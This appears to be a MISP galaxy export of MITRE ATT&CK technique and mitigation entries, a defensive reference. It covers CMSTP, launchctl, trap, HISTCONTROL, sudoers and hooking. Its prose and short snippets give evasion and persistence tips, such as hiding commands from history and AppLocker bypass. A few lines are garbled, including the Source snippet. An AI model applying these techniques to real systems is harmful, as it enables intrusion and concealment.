https://lolbas-project.github.io/lolbas/Binaries/Installutil/

CMSTP - T1191

The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.

Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1117) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other whitelisting defenses since CMSTP.exe is a legitimate, signed Microsoft application.

CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)

The tag is: misp-galaxy:mitre-attack-pattern="CMSTP - T1191"

View relationships graph

CMSTP - T1191 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="CMSTP - T1218.003" with estimative-language:likelihood-probability="almost-certain"

Table 4038. Table References
Links
https://attack.mitre.org/techniques/T1191
https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2003/cc786431(v=ws.10)
https://twitter.com/ItsReallyNick/status/958789644165894146
https://msitpros.com/?p=3960
https://twitter.com/NickTyrer/status/958450014111633408
https://github.com/api0cradle/UltimateAppLockerByPassList
http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/

Keychain - T1142

Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in <code>~/Library/Keychains/</code>,<code>/Library/Keychains/</code>, and <code>/Network/Library/Keychains/</code>. (Citation: Wikipedia keychain) The <code>security</code> command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.

The tag is: misp-galaxy:mitre-attack-pattern="Keychain - T1142"

View relationships graph

Keychain - T1142 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Keychain - T1555.001" with estimative-language:likelihood-probability="almost-certain"

Table 4039. Table References
Links
https://attack.mitre.org/techniques/T1142
https://en.wikipedia.org/wiki/Keychain_(software)
http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way

Launchctl - T1152

Launchctl controls the macOS launchd process which handles things like launch agents and launch daemons, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input. By loading or reloading launch agents or launch daemons, adversaries can install persistence or execute changes they made (Citation: Sofacy Komplex Trojan). Running a command from launchctl is as simple as <code>launchctl submit -l <labelName> — /Path/to/thing/to/execute "arg" "arg" "arg"</code>. Loading, unloading, or reloading launch agents or launch daemons can require elevated privileges.

Adversaries can abuse this functionality to execute code or even bypass whitelisting if launchctl is an allowed process.

The tag is: misp-galaxy:mitre-attack-pattern="Launchctl - T1152"

View relationships graph

Launchctl - T1152 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Launchctl - T1569.001" with estimative-language:likelihood-probability="almost-certain"

Table 4040. Table References
Links
https://attack.mitre.org/techniques/T1152
https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/

Source - T1153

This technique has been deprecated and should no longer be used.

The <code>source</code> command loads functions into the current shell or executes files in the current context. This built-in command can be run in two different ways <code>source /path/to/filename [arguments]</code> or <code>.This technique has been deprecated and should no longer be used. /path/to/filename [arguments]</code>. Take note of the space after the ".". Without a space, a new shell is created that runs the program instead of running the program within the current context. This is often used to make certain features or functions available to a shell or to update a specific shell’s environment.(Citation: Source Manual)

Adversaries can abuse this functionality to execute programs. The file executed with this technique does not need to be marked executable beforehand.

The tag is: misp-galaxy:mitre-attack-pattern="Source - T1153"

Table 4041. Table References
Links
https://attack.mitre.org/techniques/T1153
https://ss64.com/bash/source.html

Trap - T1154

The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>. Adversaries can use this to register code to be executed when the shell encounters specific interrupts either to gain execution or as a persistence mechanism. Trap commands are of the following format <code>trap 'command list' signals</code> where "command list" will be executed when "signals" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)

The tag is: misp-galaxy:mitre-attack-pattern="Trap - T1154"

View relationships graph

Trap - T1154 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Trap - T1546.005" with estimative-language:likelihood-probability="almost-certain"

Table 4042. Table References
Links
https://attack.mitre.org/techniques/T1154
https://ss64.com/bash/trap.html
https://bash.cyberciti.biz/guide/Trap_statement

HISTCONTROL - T1148

The <code>HISTCONTROL</code> environment variable keeps track of what should be saved by the <code>history</code> command and eventually into the <code>~/.bash_history</code> file when a user logs out. This setting can be configured to ignore commands that start with a space by simply setting it to "ignorespace". <code>HISTCONTROL</code> can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. <code>HISTCONTROL</code> does not exist by default on macOS, but can be set by the user and will be respected. Adversaries can use this to operate without leaving traces by simply prepending a space to all of their terminal commands.

The tag is: misp-galaxy:mitre-attack-pattern="HISTCONTROL - T1148"

View relationships graph

HISTCONTROL - T1148 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Impair Command History Logging - T1562.003" with estimative-language:likelihood-probability="almost-certain"

Table 4043. Table References
Links
https://attack.mitre.org/techniques/T1148
https://capec.mitre.org/data/definitions/13.html

Defacement - T1491

Adversaries may modify visual content available internally or externally to an enterprise network. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491) in order to cause user discomfort, or to pressure compliance with accompanying messages.

The tag is: misp-galaxy:mitre-attack-pattern="Defacement - T1491"

Table 4044. Table References
Links
https://attack.mitre.org/techniques/T1491

AppleScript - T1155

macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local or remote IPC. Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the <code>osalang</code> program. AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.

Adversaries can use this to interact with open SSH connection, move to remote machines, and even present users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they’re already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via python (Citation: Macro Malware Targets Macs). Scripts can be run from the command-line via <code>osascript /path/to/script</code> or <code>osascript -e "script here"</code>.

The tag is: misp-galaxy:mitre-attack-pattern="AppleScript - T1155"

View relationships graph

AppleScript - T1155 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="AppleScript - T1059.002" with estimative-language:likelihood-probability="almost-certain"

Table 4045. Table References
Links
https://attack.mitre.org/techniques/T1155
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/macro-malware-targets-macs/

Geofencing - T1581

Adversaries may use a device’s geographical location to limit certain malicious behaviors. For example, malware operators may limit the distribution of a second stage payload to certain geographic regions.(Citation: Lookout eSurv)

[Geofencing](https://attack.mitre.org/techniques/T1581) is accomplished by persuading the user to grant the application permission to access location services. The application can then collect, process, and exfiltrate the device’s location to perform location-based actions, such as ceasing malicious behavior or showing region-specific advertisements.

One method to accomplish [Geofencing](https://attack.mitre.org/techniques/T1581) on Android is to use the built-in Geofencing API to automatically trigger certain behaviors when the device enters or exits a specified radius around a geographical location. Similar to other [Geofencing](https://attack.mitre.org/techniques/T1581) methods, this requires that the user has granted the ACCESS_FINE_LOCATION and ACCESS_BACKGROUND_LOCATION permissions. The latter is only required if the application targets Android 10 (API level 29) or higher. However, Android 11 introduced additional permission controls that may restrict background location collection based on user permission choices at runtime. These additional controls include “Allow only while using the app”, which will effectively prohibit background location collection.(Citation: Android Geofencing API)

Similarly, on iOS, developers can use built-in APIs to setup and execute geofencing. Depending on the use case, the app will either need to call requestWhenInUseAuthorization() or requestAlwaysAuthorization(), depending on when access to the location services is required. Similar to Android, users also have the option to limit when the application can access the device’s location, including one-time use and only when the application is running in the foreground.(Citation: Apple Location Services)

[Geofencing](https://attack.mitre.org/techniques/T1581) can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. For example, location data could be used to limit malware spread and/or capabilities, which could also potentially evade application analysis environments (ex: malware analysis outside of the target geographic area). Other malicious usages could include showing language-specific [Input Prompt](https://attack.mitre.org/techniques/T1411)s and/or advertisements.

The tag is: misp-galaxy:mitre-attack-pattern="Geofencing - T1581"

Table 4046. Table References
Links
https://attack.mitre.org/techniques/T1581
https://blog.lookout.com/esurv-research
https://developer.android.com/training/location/geofencing
https://developer.apple.com/documentation/corelocation/requesting_authorization_for_location_services

Emond - T1519

Adversaries may use Event Monitor Daemon (emond) to establish persistence by scheduling malicious commands to run on predictable event triggers. Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1160) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at <code>/sbin/emond</code> will load any rules from the <code>/etc/emond.d/rules/</code> directory and take action once an explicitly defined event takes place. The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1160) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Emond - T1519"

View relationships graph

Emond - T1519 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Emond - T1546.014" with estimative-language:likelihood-probability="almost-certain"

Table 4047. Table References
Links
https://attack.mitre.org/techniques/T1519
https://www.xorrior.com/emond-persistence/
http://www.magnusviri.com/Mac/what-is-emond.html
https://www.sentinelone.com/blog/how-malware-persists-on-macos/

Hooking - T1617

Adversaries may utilize hooking to hide the presence of artifacts associated with their behaviors to evade detection. Hooking can be used to modify return values or data structures of system APIs and function calls. This process typically involves using 3rd party root frameworks, such as Xposed or Magisk, with either a system exploit or pre-existing root access. By including custom modules for root frameworks, adversaries can hook system APIs and alter the return value and/or system data structures to alter functionality/visibility of various aspects of the system.

The tag is: misp-galaxy:mitre-attack-pattern="Hooking - T1617"

Table 4048. Table References
Links
https://attack.mitre.org/techniques/T1617

Sudo - T1169

The sudoers file, <code>/etc/sudoers</code>, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the idea of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like <code>user1 ALL=(ALL) NOPASSWD: ALL</code> (Citation: OSX.Dok Malware).

Adversaries can take advantage of these configurations to execute commands as other users or spawn processes with higher privileges. You must have elevated privileges to edit this file though.

The tag is: misp-galaxy:mitre-attack-pattern="Sudo - T1169"

View relationships graph

Sudo - T1169 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Sudo and Sudo Caching - T1548.003" with estimative-language:likelihood-probability="almost-certain"

Table 4049. Table References
Links
https://attack.mitre.org/techniques/T1169
https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/

Hooking - T1179

Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions.

Hooking involves redirecting calls to these functions and can be implemented via:

Hooks procedures, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs. (Citation: Microsoft Hook Overview) (Citation: Endgame Process Injection July 2017)
Import address table (IAT) hooking, which use modifications to a process’s IAT, where pointers to imported API functions are stored. (Citation: Endgame Process Injection July 2017) (Citation: Adlice Software IAT Hooks Oct 2014) (Citation: MWRInfoSecurity Dynamic Hooking 2015)
Inline hooking, which overwrites the first bytes in an API function to redirect code flow. (Citation: Endgame Process Injection July 2017) (Citation: HighTech Bridge Inline Hooking Sept 2011) (Citation: MWRInfoSecurity Dynamic Hooking 2015)

Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), adversaries may use hooking to load and execute malicious code within the context of another process, masking the execution while also allowing access to the process’s memory and possibly elevated privileges. Installing hooking mechanisms may also provide Persistence via continuous invocation when the functions are called through normal use.

Malicious hooking mechanisms may also capture API calls that include parameters that reveal user authentication credentials for Credential Access. (Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017)

Hooking is commonly utilized by [Rootkit](https://attack.mitre.org/techniques/T1014)s to conceal files, processes, Registry keys, and other objects in order to hide malware and associated behaviors. (Citation: Symantec Windows Rootkits)

The tag is: misp-galaxy:mitre-attack-pattern="Hooking - T1179"

View relationships graph

Hooking - T1179 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Credential API Hooking - T1056.004" with estimative-language:likelihood-probability="almost-certain"

Table 4050. Table References
Links
https://attack.mitre.org/techniques/T1179
https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
https://www.exploit-db.com/docs/17802.pdf
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf
https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
https://github.com/prekageo/winhook
https://github.com/jay/gethooks
https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
http://www.gmer.net/
https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis

DNSCalc - T1324

This technique has been deprecated. Please use [DNS Calculation](https://attack.mitre.org/techniques/T1568/003).

DNS Calc is a technique in which the octets of an IP address are used to calculate the port for command and control servers from an initial DNS request. (Citation: CrowdstrikeNumberedPanda) (Citation: FireEyeDarwinsAPTGroup) (Citation: Rapid7G20Espionage)

The tag is: misp-galaxy:mitre-attack-pattern="DNSCalc - T1324"

Table 4051. Table References
Links
https://attack.mitre.org/techniques/T1324
https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/

Phishing - T1566

Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.

Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source.

The tag is: misp-galaxy:mitre-attack-pattern="Phishing - T1566"

Table 4052. Table References
Links
https://attack.mitre.org/techniques/T1566
https://capec.mitre.org/data/definitions/98.html
https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf

Keychain - T1579

Adversaries may collect the keychain storage data from an iOS device to acquire credentials. Keychains are the built-in way for iOS to keep track of users' passwords and credentials for many services and features such as Wi-Fi passwords, websites, secure notes, certificates, private keys, and VPN credentials.

On the device, the keychain database is stored outside of application sandboxes to prevent unauthorized access to the raw data. Standard iOS APIs allow applications access to their own keychain contained within the database. By utilizing a privilege escalation exploit or existing root access, an adversary can access the entire encrypted database.(Citation: Apple Keychain Services)(Citation: Elcomsoft Decrypt Keychain)

The tag is: misp-galaxy:mitre-attack-pattern="Keychain - T1579"

Table 4053. Table References
Links
https://attack.mitre.org/techniques/T1579
https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-11.html
https://developer.apple.com/documentation/security/keychain_services
https://blog.elcomsoft.com/2018/12/six-ways-to-decrypt-iphone-passwords-from-the-keychain/

Course of Action

ATT&CK Mitigation.

Course of Action is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: MITRE

Registry Run Keys / Startup Folder Mitigation - T1060

Identify and block potentially malicious software that may be executed through run key or startup folder persistence using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Registry Run Keys / Startup Folder Mitigation - T1060"

View relationships graph

Registry Run Keys / Startup Folder Mitigation - T1060 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1060" with estimative-language:likelihood-probability="almost-certain"

Table 4054. Table References
Links
https://attack.mitre.org/mitigations/T1060
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Exfiltration Over Command and Control Channel Mitigation - T1041

Mitigations for command and control apply. Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool command and control signatures over time or construct protocols in such a way to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Exfiltration Over Command and Control Channel Mitigation - T1041"

View relationships graph

Exfiltration Over Command and Control Channel Mitigation - T1041 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

Table 4055. Table References
Links
https://attack.mitre.org/mitigations/T1041
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Exfiltration Over Other Network Medium Mitigation - T1011

Ensure host-based sensors maintain visibility into usage of all network adapters and prevent the creation of new ones where possible. (Citation: Microsoft GPO Bluetooth FEB 2009) (Citation: TechRepublic Wireless GPO FEB 2009)

The tag is: misp-galaxy:mitre-course-of-action="Exfiltration Over Other Network Medium Mitigation - T1011"

View relationships graph

Exfiltration Over Other Network Medium Mitigation - T1011 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over Other Network Medium - T1011" with estimative-language:likelihood-probability="almost-certain"

Table 4056. Table References
Links
https://attack.mitre.org/mitigations/T1011
https://technet.microsoft.com/library/dd252791.aspx
https://www.techrepublic.com/blog/data-center/configuring-wireless-settings-via-group-policy/

Disable or Remove Feature or Program - M1042

Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.

The tag is: misp-galaxy:mitre-course-of-action="Disable or Remove Feature or Program - M1042"

View relationships graph

Disable or Remove Feature or Program - M1042 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="CMSTP - T1191" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Communication Through Removable Media - T1092" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over Physical Medium - T1052" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1028" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SSH Hijacking - T1184" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1173" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Scripting - T1064" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Screensaver - T1180" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Component Object Model and Distributed COM - T1175" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1076" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Regsvcs/Regasm - T1121" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Re-opened Applications - T1164" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="PowerShell - T1086" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Office Application Startup - T1137" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Mshta - T1170" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and Relay - T1171" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="InstallUtil - T1118" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Template Injection - T1221" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Emond - T1519" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Office Template Macros - T1137.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="CMSTP - T1218.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="InstallUtil - T1218.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Regsvcs/Regasm - T1218.009" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Screensaver - T1546.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Odbcconf - T1218.008" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Emond - T1546.014" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Re-opened Applications - T1547.007" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SSH - T1021.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="VNC - T1021.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1021.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SSH Hijacking - T1563.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="RDP Hijacking - T1563.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Remote Service Session Hijacking - T1563" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Inter-Process Communication - T1559" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Adversary-in-the-Middle - T1557" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over Bluetooth - T1011.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration over USB - T1052.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="MSBuild - T1127.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Signed Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SSH Authorized Keys - T1098.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Run Virtual Instance - T1564.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Verclsid - T1218.012" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="VBA Stomping - T1564.007" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Cloud Instance Metadata API - T1552.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="ARP Cache Poisoning - T1557.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Windows Credential Manager - T1555.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Traffic Signaling - T1205" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Email Forwarding Rule - T1114.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Server Software Component - T1505" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Mavinject - T1218.013" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="MMC - T1218.014" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Downgrade Attack - T1562.010" with estimative-language:likelihood-probability="almost-certain"

Table 4057. Table References
Links
https://attack.mitre.org/mitigations/M1042

Limit Access to Resource Over Network - M1035

Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.

The tag is: misp-galaxy:mitre-course-of-action="Limit Access to Resource Over Network - M1035"

View relationships graph

Limit Access to Resource Over Network - M1035 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1015" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Shared Webroot - T1051" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Hardware Additions - T1200" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1076" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="RDP Hijacking - T1563.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Adversary-in-the-Middle - T1557" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="ARP Cache Poisoning - T1557.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="TFTP Boot - T1542.005" with estimative-language:likelihood-probability="almost-certain"
